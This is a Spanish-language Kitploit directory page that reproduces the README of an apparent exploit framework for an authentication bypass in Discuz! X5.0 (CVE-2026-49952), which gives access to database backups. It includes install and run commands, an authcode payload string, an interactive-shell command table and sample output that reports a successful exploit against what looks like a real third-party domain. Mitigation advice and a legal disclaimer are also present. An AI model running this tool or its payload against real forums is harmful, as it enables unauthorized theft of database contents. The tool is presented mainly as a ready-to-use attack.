Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Framework de explotación de bypass de autenticación (CVE-2026-49952) - Vulnerabilidad crítica que permite el acceso no autenticado a las copias de seguridad de la base de datos mediante la reutilización de tokens del oráculo de cifrado UC_KEY. CVSS 9.1. Herramienta completa con detección de versiones, ataques con múltiples payloads, shell interactiva y explotación automatizada. Solo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Autenticación y AutorizaciónFrameworks de ExploitsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHub

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Ver Repositorio
12hace 1 mesAún no revisado

Acerca de

Discuz! X5.0 Framework de explotación de bypass de autenticación (CVE-2026-49952) - Vulnerabilidad crítica que permite el acceso no autenticado a las copias de seguridad de la base de datos mediante la reutilización de tokens del oráculo de cifrado UC_KEY. CVSS 9.1. Herramienta completa con detección de versiones, ataques con múltiples payloads, shell interactiva y explotación automatizada. Solo para pruebas autorizadas.

Compartir

Framework de Explotación de Bypass de Autenticación de Discuz! X5.0

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Crítico) | Versión 1.0.0

Una herramienta profesional de pruebas de penetración diseñada para identificar y demostrar la vulnerabilidad crítica de bypass de autenticación en Discuz! X5.0.

D1

📋 Tabla de contenido

  • ⚠️ Aviso legal

  • 🔍 Resumen

  • 🎯 Detalles de la vulnerabilidad

  • ✨ Características

  • 📦 Instalación

  • 🚀 Inicio rápido

  • 💻 Ejemplos de uso

  • 🖥️ Shell interactiva

  • 🛡️ Consideraciones de seguridad

  • 🔧 Solución de problemas

  • 📄 Licencia


⚠️ Aviso legal

AVISO IMPORTANTEEsta herramienta se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.NO utilice esta herramienta en sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba.El acceso no autorizado a sistemas informáticos es ilegal y antético.El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.Al utilizar esta herramienta, usted acepta cumplir con todas las leyes y regulaciones aplicables.


🔍 Resumen

El Framework de Explotación de Bypass de Autenticación de Discuz! X5.0 está diseñado para identificar y demostrar la vulnerabilidad crítica de bypass de autenticación (CVE-2026-49952) en las versiones de Discuz! X5.0 publicadas entre el 20 de marzo de 2026 y el 1 de mayo de 2026.

Esta vulnerabilidad permite a atacantes no autenticados acceder a la funcionalidad de copia de seguridad de la base de datos (dbbak.php) explotando el oráculo de cifrado UC_KEY para reutilizar tokens, lo que podría exponer contenidos sensibles de la base de datos.

Puntos clave

  • 🏆 Puntuación CVSS: 9.1 (Crítico)

  • 🔐 Impacto: Bypass de autenticación

  • 📂 Acceso: Archivos de copia de seguridad de la base de datos

  • ⚡ Complejidad: Baja (fácil de explotar)

  • 🎯 Objetivo: Discuz! X5.0 (20260320 - 20260501)


🎯 Detalles de la vulnerabilidad

Resumen técnico

Causa raíz

La vulnerabilidad existe en el endpoint dbbak.php, donde el mecanismo de validación de tokens depende del oráculo de cifrado UC_KEY. Al elaborar un payload específico en la solicitud de inicio de sesión (member.php), un atacante puede obtener un token de autenticación válido que puede reutilizarse para acceder a la funcionalidad de copia de seguridad de la base de datos sin la autorización adecuada.

Versiones afectadas

  • ❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerable

  • ✅ Discuz! X5.0 (20260510+) - Corregida


✨ Características

Características principales

  • 🔍 Detección de versión: Huella digital automática e identificación de la versión de Discuz!.

  • ⚡ Ataque multi-payload: Pruebas en paralelo de múltiples variantes de payload.

  • 🖥️ Shell interactiva: Interfaz de línea de comandos completa para explotación manual.

  • 🚀 Explotación automatizada: Explotación con un clic y configuración mínima.

  • 📊 Guardado de resultados: Exporta los resultados de explotación a archivos con marca de tiempo.

  • 🌐 Soporte de proxy: Configuración de proxy HTTP/HTTPS para el tráfico de red.

  • 🎯 Escaneo con hilos: Número de hilos configurable para optimizar el rendimiento.

  • 🎨 Salida con colores: Salida de terminal profesional con códigos de color.

Características avanzadas

  • 🔐 Soporte SSL/TLS: Gestiona objetivos tanto HTTP como HTTPS.

  • 🔄 Gestión de sesiones: Mantiene el estado de sesión persistente.

  • 📦 Personalización de payload: Soporte para inyección de payloads personalizados.

  • 🎯 Validación del objetivo: Verifica la instalación de Discuz! antes de la explotación.


📦 Instalación

Requisitos previos

  • Python: Versión 3.7 o superior

  • Pip: Administrador de paquetes de Python

Instalar desde el código fuente

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Instalar con Docker

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Inicio rápido

Uso básico

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Uso avanzado

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Ejemplos de uso

Ejemplo 1: Explotación básica

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 Salida esperada
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ Shell interactiva

Inicie la shell interactiva para la explotación manual:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

Comandos disponibles


🛡️ Consideraciones de seguridad

✅ Lo que se debe hacer

  • Úsela únicamente en sistemas que le pertenezcan o sobre los que tenga permiso explícito para realizar pruebas.

  • Obtenga autorización por escrito antes de realizar pruebas.

  • Siga las prácticas de divulgación responsable.

  • Reporte las vulnerabilidades a los proveedores de forma adecuada.

  • Úsela en entornos de laboratorio aislados para el aprendizaje.

❌ Lo que no se debe hacer

  • Nunca la use contra sistemas de producción sin autorización.

  • No comparta públicamente los datos explotados.

  • Nunca la use para actividades ilegales o robo de datos.

  • No modifique ni elimine datos durante las pruebas.

  • Nunca explote sin consentimiento.

Recomendaciones de mitigación

Para administradores de sistemas:

  1. Actualice de inmediato: Actualice a Discuz! X5.0 (20260510+) o posterior.

  2. Deshabilite el endpoint: Deshabilite temporalmente dbbak.php si no es necesario.

  3. Supervise los registros: Esté atento a accesos sospechosos a member.php y dbbak.php.

  4. Reglas WAF: Implemente reglas de firewall de aplicaciones web (WAF) para bloquear solicitudes maliciosas.

  5. Lista blanca de IPs: Restrinja el acceso al endpoint de copia de seguridad a IPs de confianza.


🔧 Solución de problemas

❌ Errores de conexión
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 Error de autenticación
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Copyright © 2026 Sudeepa Wanigarathna

Por la presente se otorga permiso, de forma gratuita, a cualquier persona que obtenga una copia de este software y de los archivos de documentación asociados (el "Software"), para tratar con el Software sin restricción, incluidos, sin limitación, los derechos de uso, copia, modificación, fusión, publicación, distribución, sublicencia y/o venta de copias del Software, y para permitir a las personas a quienes se proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:

El aviso de copyright anterior y este aviso de permiso deberán incluirse en todas las copias o partes sustanciales del Software.

EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUYENDO PERO NO LIMITADO A LAS GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN FIN PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DE LOS DERECHOS DE AUTOR SERÁN RESPONSABLES DE CUALQUIER RECLAMO, DAÑO U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O DE OTRO MODO, QUE SURJA DE, O EN CONEXIÓN CON, EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.


Autor: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ Si esta herramienta le resulta útil, ¡considere darle una estrella!

🔐 Úsela de forma responsable. Sea ético. Siga aprendiendo.

Descargar herramienta
AtributoDetalles
Tipo de vulnerabilidadBypass de autenticación
CVE IDCVE-2026-49952
Versión CVSS3.1
Puntuación CVSS9.1 (Crítico)
Vector de ataqueRed
Complejidad del ataqueBaja
Privilegios requeridosNinguno
Interacción del usuarioNinguna
Impacto de confidencialidadAlto
Impacto de integridadAlto
Impacto de disponibilidadAlto
Madurez del código de explotaciónFuncional
Nivel de remediaciónCorrección oficial disponible
ComandoDescripciónEjemplo
helpMuestra todos los comandos disponibleshelp
scanDetecta la versión de Discuz! y comprueba la vulnerabilidadscan
get [payload]Extrae el authcode (payload personalizado opcional )`get admin
exploit [op]Ejecuta el exploit (predeterminado: backup)exploit backup
saveGuarda los resultados en un archivosave
infoMuestra la información de la sesióninfo
clearLimpia la pantalla de la terminalclear
exit / quitSale de la shell interactivaexit